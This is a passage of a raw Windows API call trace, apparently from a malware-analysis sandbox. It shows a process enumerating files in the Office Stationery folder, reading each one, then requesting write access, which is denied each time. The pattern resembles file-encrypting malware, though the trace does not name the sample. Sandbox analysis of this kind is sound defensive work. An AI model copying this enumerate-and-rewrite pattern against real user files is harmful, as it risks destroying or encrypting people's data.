shared\\Stationery\\ShadesOfBlue.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg", lpUsedDefaultChar=0x0) returned 75 [0102.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0102.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.463] AreFileApisANSI () returned 1 [0102.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0102.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85620 [0102.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 75 [0102.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.464] GetFileType (hFile=0x27c) returned 0x1 [0102.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0102.464] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.464] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.465] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.465] CloseHandle (hObject=0x27c) returned 1 [0102.465] AreFileApisANSI () returned 1 [0102.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0102.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x851c0 [0102.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 75 [0102.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.465] GetLastError () returned 0x5 [0102.465] GetLastError () returned 0x5 [0102.465] SetLastError (dwErrCode=0x5) [0102.465] GetLastError () returned 0x5 [0102.466] SetLastError (dwErrCode=0x5) [0102.466] GetLastError () returned 0x5 [0102.466] SetLastError (dwErrCode=0x5) [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0102.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.466] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0102.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0102.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0102.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.467] AreFileApisANSI () returned 1 [0102.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm", lpUsedDefaultChar=0x0) returned 72 [0102.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0102.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0102.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.467] AreFileApisANSI () returned 1 [0102.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0102.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0102.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 72 [0102.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.468] GetFileType (hFile=0x27c) returned 0x1 [0102.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.468] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.468] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.468] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.469] CloseHandle (hObject=0x27c) returned 1 [0102.469] AreFileApisANSI () returned 1 [0102.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0102.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0102.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 72 [0102.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.469] GetLastError () returned 0x5 [0102.469] GetLastError () returned 0x5 [0102.469] SetLastError (dwErrCode=0x5) [0102.469] GetLastError () returned 0x5 [0102.469] SetLastError (dwErrCode=0x5) [0102.469] GetLastError () returned 0x5 [0102.469] SetLastError (dwErrCode=0x5) [0102.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0102.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.470] AreFileApisANSI () returned 1 [0102.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg", lpUsedDefaultChar=0x0) returned 71 [0102.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.471] AreFileApisANSI () returned 1 [0102.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0102.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aa88 [0102.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 71 [0102.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.471] GetFileType (hFile=0x27c) returned 0x1 [0102.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.471] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.471] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.472] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.472] CloseHandle (hObject=0x27c) returned 1 [0102.472] AreFileApisANSI () returned 1 [0102.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0102.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0102.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 71 [0102.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.472] GetLastError () returned 0x5 [0102.472] GetLastError () returned 0x5 [0102.472] SetLastError (dwErrCode=0x5) [0102.472] GetLastError () returned 0x5 [0102.472] SetLastError (dwErrCode=0x5) [0102.472] GetLastError () returned 0x5 [0102.472] SetLastError (dwErrCode=0x5) [0102.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0102.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.473] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.473] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.473] AreFileApisANSI () returned 1 [0102.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm", lpUsedDefaultChar=0x0) returned 68 [0102.474] RtlAllocateHeap 